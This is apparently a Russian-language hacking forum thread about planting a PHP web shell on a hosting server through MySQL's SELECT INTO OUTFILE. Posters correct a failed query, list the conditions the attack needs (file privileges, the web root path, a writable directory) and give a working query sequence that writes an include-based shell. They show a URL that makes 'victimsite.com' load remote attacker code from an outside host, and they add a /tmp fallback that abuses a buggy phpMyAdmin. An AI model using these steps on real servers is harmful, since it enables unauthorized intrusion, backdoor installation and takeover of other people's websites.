INSERT INTO table VALUES(7777777, 0, "<? system($e); ?>", 0) SELECT * FROM table WHERE (param1 = 7777777) INTO OUTFILE /home/site/www/shell.php Если не прав поправте.
Ругается на ошибку "1064: you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table VALUES(7777777, 0, "<? system($e); ?>", 0) SELECT * FROM"
Подумай сам.... что это может быть.. запрос тебе дали...Или ты хочешь чтобы дебе Полные права дали на Этой тачке? Гы... Иногда надо думать головой...
Вообще phpMyAdmin тут не причем, есть он или нет его - не имеет значения. Ну... практически =) Дело в MySQL. Но чтобы залить файл, тот же шелл, на хостинг тебе потребуется следующее: 1) Включенные MySQL файловые функции (а их почти все вырубают для безопасности) 2) Знать полный адрес от корня файловой системы до web контента 3) Иметь в вебе диру с 0770 или 0777 чмодом 4) Выучить скуль =) 2 SanyaX значение INTO OUTFILE ковычками обособляется =)
Вот так надо: CREATE TABLE `shell` (`script` TEXT NOT NULL) COMMENT = 'table for include'; INSERT INTO `shell` ( `script` ) VALUES ('<? phpcode(); ?>'); SELECT script FROM `shell` INTO OUTFILE '/home/localhost/www/shell.php'; DROP TABLE `shell`; Вместо <? phpcode(); ?> пишешь код шелла или <? include($_GET[‘shell’]); ?> а потом переходишь на http://victimsite.com/shell.php?shell=http://our_site.narod.ru/remview.php Никаких кавычек в INTO OUTFILE не надо. Только права должны быть рутовые...
если нет возможности в веб дирриктории создать файлик то можно поробовать в тмп и если phpmyadmin бажная(кажись это 2.6.*, или ещё какие, точно не помню) то проинклудить локально с её помощью, вотъ P.S. а файлик так создаем : select '<? phpinfo(); ?>' from test into outfile '/tmp/ddd'